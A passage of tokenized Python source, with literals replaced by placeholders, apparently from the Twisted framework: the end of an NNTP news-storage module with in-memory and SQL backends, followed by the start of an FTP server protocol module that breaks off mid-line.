<NUM_LIT:1> ) : <EOL> if i in self . dbm [ '<STR_LIT>' ] [ group ] . articles : <EOL> r . append ( ( i , self . dbm [ '<STR_LIT>' ] [ group ] . articles [ i ] . getHeader ( header ) ) ) <EOL> return defer . succeed ( r ) <EOL> def listGroupRequest ( self , group ) : <EOL> if self . dbm [ '<STR_LIT>' ] . has_key ( group ) : <EOL> return defer . succeed ( ( group , self . dbm [ '<STR_LIT>' ] [ group ] . articles . keys ( ) ) ) <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> def groupRequest ( self , group ) : <EOL> try : <EOL> g = self . dbm [ '<STR_LIT>' ] [ group ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> flags = g . flags <EOL> low = g . minArticle <EOL> high = g . maxArticle <EOL> num = high - low + <NUM_LIT:1> <EOL> return defer . succeed ( ( group , num , high , low , flags ) ) <EOL> def articleExistsRequest ( self , id ) : <EOL> return defer . succeed ( id in self . dbm [ '<STR_LIT>' ] ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> try : <EOL> xref = self . dbm [ '<STR_LIT>' ] [ id ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + id ) ) <EOL> else : <EOL> group , index = xref [ <NUM_LIT:0> ] <EOL> index = int ( index ) <EOL> try : <EOL> a = self . dbm [ '<STR_LIT>' ] [ group ] . articles [ index ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> return defer . succeed ( ( <EOL> index , <EOL> a . getHeader ( '<STR_LIT>' ) , <EOL> StringIO . StringIO ( a . textHeaders ( ) + '<STR_LIT:\r\n>' + a . body ) <EOL> ) ) <EOL> def headRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> try : <EOL> xref = self . dbm [ '<STR_LIT>' ] [ id ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + id ) ) <EOL> else : <EOL> group , index = xref [ <NUM_LIT:0> ] <EOL> index = int ( index ) <EOL> try : <EOL> a = self . dbm [ '<STR_LIT>' ] [ group ] . articles [ index ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , a . textHeaders ( ) ) ) <EOL> def bodyRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> try : <EOL> xref = self . dbm [ '<STR_LIT>' ] [ id ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + id ) ) <EOL> else : <EOL> group , index = xref [ <NUM_LIT:0> ] <EOL> index = int ( index ) <EOL> try : <EOL> a = self . dbm [ '<STR_LIT>' ] [ group ] . articles [ index ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , StringIO . StringIO ( a . body ) ) ) <EOL> class NewsStorageAugmentation : <EOL> """<STR_LIT>""" <EOL> implements ( INewsStorage ) <EOL> schema = """<STR_LIT>""" <EOL> def __init__ ( self , info ) : <EOL> self . info = info <EOL> self . dbpool = adbapi . ConnectionPool ( ** self . info ) <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> self . info [ '<STR_LIT:password>' ] = getpass . getpass ( '<STR_LIT>' % ( self . info [ '<STR_LIT:user>' ] , ) ) <EOL> self . dbpool = adbapi . ConnectionPool ( ** self . info ) <EOL> del self . info [ '<STR_LIT:password>' ] <EOL> def listRequest ( self ) : <EOL> sql = """<STR_LIT>""" <EOL> return self . dbpool . runQuery ( sql ) <EOL> def subscriptionRequest ( self ) : <EOL> sql = """<STR_LIT>""" <EOL> return self . dbpool . runQuery ( sql ) <EOL> def postRequest ( self , message ) : <EOL> cleave = message . find ( '<STR_LIT>' ) <EOL> headers , article = message [ : cleave ] , message [ cleave + <NUM_LIT:4> : ] <EOL> article = Article ( headers , article ) <EOL> return self . dbpool . runInteraction ( self . _doPost , article ) <EOL> def _doPost ( self , transaction , article ) : <EOL> groups = article . getHeader ( '<STR_LIT>' ) . split ( ) <EOL> if not len ( groups ) : <EOL> raise NNTPError ( '<STR_LIT>' ) <EOL> sql = """<STR_LIT>""" % ( '<STR_LIT:U+002CU+0020>' . join ( [ ( "<STR_LIT>" % ( adbapi . safe ( group ) , ) ) for group in groups ] ) , ) <EOL> transaction . execute ( sql ) <EOL> result = transaction . fetchall ( ) <EOL> if not len ( result ) : <EOL> raise NNTPError ( '<STR_LIT>' ) <EOL> sql = """<STR_LIT>""" % ( '<STR_LIT:U+002CU+0020>' . join ( [ ( "<STR_LIT>" % ( id , ) ) for ( group , id ) in result ] ) , ) <EOL> transaction . execute ( sql ) <EOL> indices = transaction . fetchall ( ) <EOL> if not len ( indices ) : <EOL> raise NNTPError ( '<STR_LIT>' ) <EOL> gidToName = dict ( [ ( b , a ) for ( a , b ) in result ] ) <EOL> gidToIndex = dict ( indices ) <EOL> nameIndex = [ ] <EOL> for i in gidToName : <EOL> nameIndex . append ( ( gidToName [ i ] , gidToIndex [ i ] ) ) <EOL> xrefs = socket . gethostname ( ) . split ( ) [ <NUM_LIT:0> ] <EOL> xrefs = xrefs + '<STR_LIT:U+0020>' + '<STR_LIT:U+0020>' . join ( [ ( '<STR_LIT>' % ( group , id ) ) for ( group , id ) in nameIndex ] ) <EOL> article . putHeader ( '<STR_LIT>' , xrefs ) <EOL> sql = """<STR_LIT>""" % ( <EOL> adbapi . safe ( article . getHeader ( '<STR_LIT>' ) ) , <EOL> adbapi . safe ( article . textHeaders ( ) ) , <EOL> adbapi . safe ( article . body ) <EOL> ) <EOL> transaction . execute ( sql ) <EOL> for gid in gidToName : <EOL> sql = """<STR_LIT>""" % ( gid , gidToIndex [ gid ] ) <EOL> transaction . execute ( sql ) <EOL> return len ( nameIndex ) <EOL> def overviewRequest ( self ) : <EOL> sql = """<STR_LIT>""" <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( lambda result : [ header [ <NUM_LIT:0> ] for header in result ] ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> sql = """<STR_LIT>""" % ( <EOL> adbapi . safe ( group ) , <EOL> low is not None and "<STR_LIT>" % ( low , ) or "<STR_LIT>" , <EOL> high is not None and "<STR_LIT>" % ( high , ) or "<STR_LIT>" <EOL> ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda results : [ <EOL> [ id ] + Article ( header , None ) . overview ( ) for ( id , header ) in results <EOL> ] <EOL> ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( group ) , low , high ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda results : [ <EOL> ( i , Article ( h , None ) . getHeader ( h ) ) for ( i , h ) in results <EOL> ] <EOL> ) <EOL> def listGroupRequest ( self , group ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( group ) , ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda results , group = group : ( group , [ res [ <NUM_LIT:0> ] for res in results ] ) <EOL> ) <EOL> def groupRequest ( self , group ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( group ) , ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda results : tuple ( results [ <NUM_LIT:0> ] ) <EOL> ) <EOL> def articleExistsRequest ( self , id ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( id ) , ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda result : bool ( result [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( id ) , adbapi . safe ( group ) ) <EOL> else : <EOL> sql = """<STR_LIT>""" % ( index , adbapi . safe ( group ) ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda result : ( <EOL> result [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> result [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> StringIO . StringIO ( result [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] + '<STR_LIT:\r\n>' + result [ <NUM_LIT:0> ] [ <NUM_LIT:3> ] ) <EOL> ) <EOL> ) <EOL> def headRequest ( self , group , index ) : <EOL> sql = """<STR_LIT>""" % ( index , adbapi . safe ( group ) ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( lambda result : result [ <NUM_LIT:0> ] ) <EOL> def bodyRequest ( self , group , index ) : <EOL> sql = """<STR_LIT>""" % ( index , adbapi . safe ( group ) ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda result : result [ <NUM_LIT:0> ] <EOL> ) . addCallback ( <EOL> lambda ( index , id , body ) : ( index , id , StringIO . StringIO ( body ) ) <EOL> ) <EOL> def makeGroupSQL ( groups ) : <EOL> res = '<STR_LIT>' <EOL> for g in groups : <EOL> res = res + """<STR_LIT>""" % ( adbapi . safe ( g ) , ) <EOL> return res <EOL> def makeOverviewSQL ( ) : <EOL> res = '<STR_LIT>' <EOL> for o in OVERVIEW_FMT : <EOL> res = res + """<STR_LIT>""" % ( adbapi . safe ( o ) , ) <EOL> return res </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> import re <EOL> import stat <EOL> import errno <EOL> import fnmatch <EOL> try : <EOL> import pwd , grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> from zope . interface import Interface , implements <EOL> from twisted import copyright <EOL> from twisted . internet import reactor , interfaces , protocol , error , defer <EOL> from twisted . protocols import basic , policies <EOL> from twisted . python import log , failure , filepath <EOL> from twisted . cred import error as cred_error , portal , credentials , checkers <EOL> RESTART_MARKER_REPLY = "<STR_LIT:100>" <EOL> SERVICE_READY_IN_N_MINUTES = "<STR_LIT>" <EOL> DATA_CNX_ALREADY_OPEN_START_XFR = "<STR_LIT>" <EOL> FILE_STATUS_OK_OPEN_DATA_CNX = "<STR_LIT>" <EOL> CMD_OK = "<STR_LIT>" <EOL> TYPE_SET_OK = "<STR_LIT>" <EOL> ENTERING_PORT_MODE = "<STR_LIT>" <EOL> CMD_NOT_IMPLMNTD_SUPERFLUOUS = "<STR_LIT>" <EOL> SYS_STATUS_OR_HELP_REPLY = "<STR_LIT>" <EOL> FEAT_OK = '<STR_LIT>' <EOL> DIR_STATUS = "<STR_LIT>" <EOL> FILE_STATUS = "<STR_LIT>" <EOL> HELP_MSG = "<STR_LIT>" <EOL> NAME_SYS_TYPE = "<STR_LIT>" <EOL> SVC_READY_FOR_NEW_USER = "<STR_LIT>" <EOL> WELCOME_MSG = "<STR_LIT>" <EOL> SVC_CLOSING_CTRL_CNX = "<STR_LIT>" <EOL> GOODBYE_MSG = "<STR_LIT>" <EOL> DATA_CNX_OPEN_NO_XFR_IN_PROGRESS = "<STR_LIT>" <EOL> CLOSING_DATA_CNX = "<STR_LIT>" <EOL> TXFR_COMPLETE_OK = "<STR_LIT>" <EOL> ENTERING_PASV_MODE = "<STR_LIT>" <EOL> ENTERING_EPSV_MODE = "<STR_LIT>" <EOL> USR_LOGGED_IN_PROCEED = "<STR_LIT>" <EOL> GUEST_LOGGED_IN_PROCEED = "<STR_LIT>" <EOL> REQ_FILE_ACTN_COMPLETED_OK = "<STR_LIT>" <EOL> PWD_REPLY = "<STR_LIT>" <EOL> MKD_REPLY = "<STR_LIT>" <EOL> USR_NAME_OK_NEED_PASS = "<STR_LIT>" <EOL> GUEST_NAME_OK_NEED_EMAIL = "<STR_LIT>" <EOL> NEED_ACCT_FOR_LOGIN = "<STR_LIT>" <EOL> REQ_FILE_ACTN_PENDING_FURTHER_INFO = "<STR_LIT>" <EOL> SVC_NOT_AVAIL_CLOSING_CTRL_CNX = "<STR_LIT>" <EOL> TOO_MANY_CONNECTIONS = "<STR_LIT>" <EOL> CANT_OPEN_DATA_CNX = "<STR_LIT>" <EOL> CNX_CLOSED_TXFR_ABORTED = "<STR_LIT>" <EOL> REQ_ACTN_ABRTD_FILE_UNAVAIL = "<STR_LIT>" <EOL> REQ_ACTN_ABRTD_LOCAL_ERR = "<STR_LIT>" <EOL> REQ_ACTN_ABRTD_INSUFF_STORAGE = "<STR_LIT>" <EOL> SYNTAX_ERR = "<STR_LIT>" <EOL> SYNTAX_ERR_IN_ARGS = "<STR_LIT>" <EOL> CMD_NOT_IMPLMNTD = "<STR_LIT>" <EOL> OPTS_NOT_IMPLEMENTED = '<STR_LIT>' <EOL> BAD_CMD_SEQ = "<STR_LIT>" <EOL> CMD_NOT_IMPLMNTD_FOR_PARAM = "<STR_LIT>" <EOL> NOT_LOGGED_IN = "<STR_LIT>" <EOL> AUTH_FAILURE = "<STR_LIT>" <EOL> NEED_ACCT_FOR_STOR = "<STR_LIT>" <EOL> FILE_NOT_FOUND = "<STR_LIT>" <EOL> PERMISSION_DENIED = "<STR_LIT>" <EOL> ANON_USER_DENIED = "<STR_LIT>" <EOL> IS_NOT_A_DIR = "<STR_LIT>" <EOL> REQ_ACTN_NOT_TAKEN = "<STR_LIT>" <EOL> FILE_EXISTS = "<STR_LIT>" <EOL> IS_A_DIR = "<STR_LIT>" <EOL> PAGE_TYPE_UNK = "<STR_LIT>" <EOL> EXCEEDED_STORAGE_ALLOC = "<STR_LIT>" <EOL> FILENAME_NOT_ALLOWED = "<STR_LIT>" <EOL> RESPONSE = { <EOL> RESTART_MARKER_REPLY : '<STR_LIT>' , <EOL> SERVICE_READY_IN_N_MINUTES : '<STR_LIT>' , <EOL> DATA_CNX_ALREADY_OPEN_START_XFR : '<STR_LIT>' , <EOL> FILE_STATUS_OK_OPEN_DATA_CNX : '<STR_LIT>' , <EOL> CMD_OK : '<STR_LIT>' , <EOL> TYPE_SET_OK : '<STR_LIT>' , <EOL> ENTERING_PORT_MODE : '<STR_LIT>' , <EOL> CMD_NOT_IMPLMNTD_SUPERFLUOUS : '<STR_LIT>' , <EOL> SYS_STATUS_OR_HELP_REPLY : '<STR_LIT>' , <EOL> FEAT_OK : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> DIR_STATUS : '<STR_LIT>' , <EOL> FILE_STATUS : '<STR_LIT>' , <EOL> HELP_MSG : '<STR_LIT>' , <EOL> NAME_SYS_TYPE : '<STR_LIT>' , <EOL> WELCOME_MSG : "<STR_LIT>" , <EOL> SVC_READY_FOR_NEW_USER : '<STR_LIT>' , <EOL> SVC_CLOSING_CTRL_CNX : '<STR_LIT>' , <EOL> GOODBYE_MSG : '<STR_LIT>' , <EOL> DATA_CNX_OPEN_NO_XFR_IN_PROGRESS : '<STR_LIT>' , <EOL> CLOSING_DATA_CNX : '<STR_LIT>' , <EOL> TXFR_COMPLETE_OK : '<STR_LIT>' , <EOL> ENTERING_PASV_MODE : '<STR_LIT>' , <EOL> ENTERING_EPSV_MODE : '<STR_LIT>' , <EOL> USR_LOGGED_IN_PROCEED : '<STR_LIT>' , <EOL> GUEST_LOGGED_IN_PROCEED : '<STR_LIT>' , <EOL> REQ_FILE_ACTN_COMPLETED_OK : '<STR_LIT>' , <EOL> PWD_REPLY : '<STR_LIT>' , <EOL> MKD_REPLY : '<STR_LIT>' , <EOL> USR_NAME_OK_NEED_PASS : '<STR_LIT>' , <EOL> GUEST_NAME_OK_NEED_EMAIL : '<STR_LIT>' , <EOL> NEED_ACCT_FOR_LOGIN : '<STR_LIT>' , <EOL> REQ_FILE_ACTN_PENDING_FURTHER_INFO : '<STR_LIT>' , <EOL> SVC_NOT_AVAIL_CLOSING_CTRL_CNX : '<STR_LIT>' , <EOL> TOO_MANY_CONNECTIONS : '<STR_LIT>' , <EOL> CANT_OPEN_DATA_CNX : "<STR_LIT>" , <EOL> CNX_CLOSED_TXFR_ABORTED : '<STR_LIT>' , <EOL> REQ_ACTN_ABRTD_FILE_UNAVAIL : '<STR_LIT>' , <EOL> REQ_ACTN_ABRTD_LOCAL_ERR : '<STR_LIT>' , <EOL> REQ_ACTN_ABRTD_INSUFF_STORAGE : '<STR_LIT>' , <EOL> SYNTAX_ERR : "<STR_LIT>" , <EOL> SYNTAX_ERR_IN_ARGS : '<STR_LIT>' , <EOL> CMD_NOT_IMPLMNTD : "<STR_LIT>" , <EOL> OPTS_NOT_IMPLEMENTED : "<STR_LIT>" , <EOL> BAD_CMD_SEQ : '<STR_LIT>' , <EOL> CMD_NOT_IMPLMNTD_FOR_PARAM : "<STR_LIT>" , <EOL> NOT_LOGGED_IN : '<STR_LIT>' , <EOL> AUTH_FAILURE : '<STR_LIT>' , <EOL> NEED_ACCT_FOR_STOR : '<STR_LIT>' , <EOL> FILE_NOT_FOUND : '<STR_LIT>' , <EOL> PERMISSION_DENIED : '<STR_LIT>' , <EOL> ANON_USER_DENIED : '<STR_LIT>' , <EOL> IS_NOT_A_DIR : '<STR_LIT>' , <EOL> FILE_EXISTS : '<STR_LIT>' , <EOL> IS_A_DIR : '<STR_LIT>' , <EOL> REQ_ACTN_NOT_TAKEN : '<STR_LIT>' , <EOL> PAGE_TYPE_UNK : '<STR_LIT>' , <EOL> EXCEEDED_STORAGE_ALLOC : '<STR_LIT>' , <EOL> FILENAME_NOT_ALLOWED : '<STR_LIT>' <EOL> } <EOL> class InvalidPath ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def toSegments ( cwd , path ) : <EOL> """<STR_LIT>""" <EOL> if path . startswith ( '<STR_LIT:/>' ) : <EOL> segs = [ ] <EOL> else : <EOL> segs = cwd [ : ] <EOL> for s in path . split ( '<STR_LIT:/>' ) : <EOL> if s == '<STR_LIT:.>' or s == '<STR_LIT>' : <EOL> continue <EOL> elif s == '<STR_LIT:..>' : <EOL> if segs : <EOL> segs . pop ( ) <EOL> else : <EOL> raise InvalidPath ( cwd , path ) <EOL> elif '<STR_LIT>' in s or '<STR_LIT:/>' in s : <EOL> raise InvalidPath ( cwd , path ) <EOL> else : <EOL> segs . append ( s ) <EOL> return segs <EOL> def errnoToFailure ( e , path ) : <EOL> """<STR_LIT>""" <EOL> if e == errno . ENOENT : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> elif e == errno . EACCES or e == errno . EPERM : <EOL> return defer . fail ( PermissionDeniedError ( path ) ) <EOL> elif e == errno . ENOTDIR : <EOL> return defer . fail ( IsNotADirectoryError ( path ) ) <EOL> elif e == errno . EEXIST : <EOL> return defer . fail ( FileExistsError ( path ) ) <EOL> elif e == errno . EISDIR : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> else : <EOL> return defer . fail ( ) <EOL> def _isGlobbingExpression ( segments = None ) : <EOL> """<STR_LIT>""" <EOL> if not segments : <EOL> return False <EOL> globCandidate = segments [ - <NUM_LIT:1> ] <EOL> emtpyTranslations = fnmatch . translate ( '<STR_LIT>' ) <EOL> globTranslations = fnmatch . translate ( globCandidate ) <EOL> if globCandidate + emtpyTranslations == globTranslations : <EOL> return False <EOL> else : <EOL> return True <EOL> class FTPCmdError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * msg ) : <EOL> Exception . __init__ ( self , * msg ) <EOL> self . errorMessage = msg <EOL> def response ( self ) : <EOL> """<STR_LIT>""" <EOL> return RESPONSE [ self . errorCode ] % self . errorMessage <EOL> class FileNotFoundError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = FILE_NOT_FOUND <EOL> class AnonUserDeniedError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = ANON_USER_DENIED <EOL> class PermissionDeniedError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = PERMISSION_DENIED <EOL> class IsNotADirectoryError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = IS_NOT_A_DIR <EOL> class FileExistsError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = FILE_EXISTS <EOL> class IsADirectoryError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = IS_A_DIR <EOL> class CmdSyntaxError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = SYNTAX_ERR <EOL> class CmdArgSyntaxError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = SYNTAX_ERR_IN_ARGS <EOL> class CmdNotImplementedError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = CMD_NOT_IMPLMNTD <EOL> class CmdNotImplementedForArgError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = CMD_NOT_IMPLMNTD_FOR_PARAM <EOL> class FTPError ( Exception ) : <EOL> pass <EOL> class PortConnectionError ( Exception ) : <EOL> pass <EOL> class BadCmdSequenceError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = BAD_CMD_SEQ <EOL> class AuthorizationError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = AUTH_FAILURE <EOL> def debugDeferred ( self , * _ ) : <EOL> log . msg ( '<STR_LIT>' % str ( _ ) , debug = True ) <EOL> _months = [ <EOL> None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DTP ( object , protocol . Protocol ) : <EOL> implements ( interfaces . IConsumer ) <EOL> isConnected = False <EOL> _cons = None <EOL> _onConnLost = None <EOL> _buffer = None <EOL> def connectionMade ( self ) : <EOL> self . isConnected = True <EOL> self . factory . deferred . callback ( None ) <EOL> self . _buffer = [ ] <EOL> def connectionLost ( self , reason ) : <EOL> self . isConnected = False <EOL> if self . _onConnLost is not None : <EOL> self . _onConnLost . callback ( None ) <EOL> def sendLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> self . transport . write ( line + '<STR_LIT:\r\n>' ) <EOL> def _formatOneListResponse ( self , name , size , directory , permissions , hardlinks , modified , owner , group ) : <EOL> """<STR_LIT>""" <EOL> def formatDate ( mtime ) : <EOL> now = time . gmtime ( ) <EOL> info = { <EOL> '<STR_LIT>' : _months [ mtime . tm_mon ] , <EOL> '<STR_LIT>' : mtime . tm_mday , <EOL> '<STR_LIT>' : mtime . tm_year , <EOL> '<STR_LIT>' : mtime . tm_hour , <EOL> '<STR_LIT>' : mtime . tm_min <EOL> } <EOL> if now . tm_year != mtime . tm_year : <EOL> return '<STR_LIT>' % info <EOL> else : <EOL> return '<STR_LIT>' % info <EOL> format = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return format % { <EOL> '<STR_LIT>' : directory and '<STR_LIT:d>' or '<STR_LIT:->' , <EOL> '<STR_LIT>' : permissions . shorthand ( ) , <EOL> '<STR_LIT>' : hardlinks , <EOL> '<STR_LIT>' : owner [ : <NUM_LIT:8> ] , <EOL> '<STR_LIT>' : group [ : <NUM_LIT:8> ] , <EOL> '<STR_LIT:size>' : size , <EOL> '<STR_LIT:date>' : formatDate ( time . gmtime ( modified ) ) , <EOL> '<STR_LIT:name>' : name } <EOL> def sendListResponse ( self , name , response ) : <EOL> self . sendLine ( self . _formatOneListResponse ( name , * response ) ) <EOL> def registerProducer ( self , producer , streaming ) : <EOL> return self . transport . registerProducer ( producer , streaming ) <EOL> def unregisterProducer ( self ) : <EOL> self . transport . unregisterProducer ( ) <EOL> self . transport . loseConnection ( ) <EOL> def write ( self , data ) : <EOL> if self . isConnected : <EOL> return self . transport . write ( data ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def _conswrite ( self , bytes ) : <EOL> try : <EOL> self . _cons . write ( bytes ) <EOL> except : <EOL> self . _onConnLost . errback ( ) <EOL> def dataReceived ( self , bytes ) : <EOL> if self . _cons is not None : <EOL> self . _conswrite ( bytes ) <EOL> else : <EOL> self . _buffer . append ( bytes ) <EOL> def _unregConsumer ( self , ignored ) : <EOL> self . _cons . unregisterProducer ( ) <EOL> self . _cons = None <EOL> del self . _onConnLost <EOL> return ignored <EOL> def registerConsumer ( self , cons ) : <EOL> assert self . _cons is None <EOL> self . _cons = cons <EOL> self . _cons . registerProducer ( self , True ) <EOL> for chunk in self . _buffer : <EOL> self . _conswrite ( chunk ) <EOL> self . _buffer = None <EOL> if self . isConnected : <EOL> self . _onConnLost = d = defer . Deferred ( ) <EOL> d . addBoth ( self . _unregConsumer ) <EOL> return d <EOL> else : <EOL> self . _cons . unregisterProducer ( ) <EOL> self . _cons = None <EOL> return defer . succeed ( None ) <EOL> def resumeProducing ( self ) : <EOL> self . transport . resumeProducing ( ) <EOL> def pauseProducing ( self ) : <EOL> self . transport . pauseProducing ( ) <EOL> def stopProducing ( self ) : <EOL> self . transport . stopProducing ( ) <EOL> class DTPFactory ( protocol . ClientFactory ) : <EOL> """<STR_LIT>""" <EOL> _IN_PROGRESS = object ( ) <EOL> _FAILED = object ( ) <EOL> _FINISHED = object ( ) <EOL> _state = _IN_PROGRESS <EOL> peerCheck = False <EOL> def __init__ ( self , pi , peerHost = None , reactor = None ) : <EOL> """<STR_LIT>""" <EOL> self . pi = pi <EOL> self . peerHost = peerHost <EOL> self . deferred = defer . Deferred ( ) <EOL> self . delayedCall = None <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> def buildProtocol ( self , addr ) : <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> if self . _state is not self . _IN_PROGRESS : <EOL> return None <EOL> self . _state = self . _FINISHED <EOL> self . cancelTimeout ( ) <EOL> p = DTP ( ) <EOL> p . factory = self <EOL> p . pi = self . pi <EOL> self . pi . dtpInstance = p <EOL> return p <EOL> def stopFactory ( self ) : <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> self . cancelTimeout ( ) <EOL> def timeoutFactory ( self ) : <EOL> log . msg ( '<STR_LIT>' ) <EOL> if self . _state is not self . _IN_PROGRESS : <EOL> return <EOL> self . _state = self . _FAILED <EOL> d = self . deferred <EOL> self . deferred = None <EOL> d . errback ( <EOL> PortConnectionError ( defer . TimeoutError ( "<STR_LIT>" ) ) ) <EOL> def cancelTimeout ( self ) : <EOL> if self . delayedCall is not None and self . delayedCall . active ( ) : <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> self . delayedCall . cancel ( ) <EOL> def setTimeout ( self , seconds ) : <EOL> log . msg ( '<STR_LIT>' % seconds ) <EOL> self . delayedCall = self . _reactor . callLater ( seconds , self . timeoutFactory ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> if self . _state is not self . _IN_PROGRESS : <EOL> return <EOL> self . _state = self . _FAILED <EOL> d = self . deferred <EOL> self . deferred = None <EOL> d . errback ( PortConnectionError ( reason ) ) <EOL> class ASCIIConsumerWrapper ( object ) : <EOL> def __init__ ( self , cons ) : <EOL> self . cons = cons <EOL> self . registerProducer = cons . registerProducer <EOL> self . unregisterProducer = cons . unregisterProducer <EOL> assert os . linesep == "<STR_LIT:\r\n>" or len ( os . linesep ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> if os . linesep == "<STR_LIT:\r\n>" : <EOL> self . write = cons . write <EOL> def write ( self , bytes ) : <EOL> return self . cons . write ( bytes . replace ( os . linesep , "<STR_LIT:\r\n>" ) ) <EOL> class FileConsumer ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( interfaces . IConsumer ) <EOL> def __init__ ( self , fObj ) : <EOL> self . fObj = fObj <EOL> def registerProducer ( self , producer , streaming ) : <EOL> self . producer = producer <EOL> assert streaming <EOL> def unregisterProducer ( self ) : <EOL> self . producer = None <EOL> self . fObj . close ( ) <EOL> def write ( self , bytes ) : <EOL> self . fObj . write ( bytes ) <EOL> class FTPOverflowProtocol ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> def connectionMade ( self ) : <EOL> self . sendLine ( RESPONSE [ TOO_MANY_CONNECTIONS ] ) <EOL> self . transport . loseConnection ( ) <EOL> class FTP ( object , basic . LineReceiver , policies . TimeoutMixin ) : <EOL> """<STR_LIT>""" <EOL> disconnected = False <EOL> UNAUTH , INAUTH , AUTHED , RENAMING = range ( <NUM_LIT:4> ) <EOL> dtpTimeout = <NUM_LIT:10> <EOL> portal = None <EOL> shell = None <EOL> dtpFactory = None <EOL> dtpPort = None <EOL> dtpInstance = None <EOL> binary = True <EOL> PUBLIC_COMMANDS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> FEATURES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> passivePortRange = xrange ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> listenFactory = reactor . listenTCP <EOL> def reply ( self , key , * args ) : <EOL> msg = RESPONSE [ key ] % args <EOL> self . sendLine ( msg ) <EOL> def connectionMade ( self ) : <EOL> self . state = self . UNAUTH <EOL> self . setTimeout ( self . timeOut ) <EOL> self . reply ( WELCOME_MSG , self . factory . welcomeMessage ) <EOL> def connectionLost ( self , reason ) : <EOL> if self . dtpFactory : <EOL> self . cleanupDTP ( ) <EOL> self . setTimeout ( None ) <EOL> if hasattr ( self . shell , '<STR_LIT>' ) and self . shell . logout is not None : <EOL> self . shell . logout ( ) <EOL> self . shell = None <EOL> self . transport = None <EOL> def timeoutConnection ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> def lineReceived ( self , line ) : <EOL> self . resetTimeout ( ) <EOL> self . 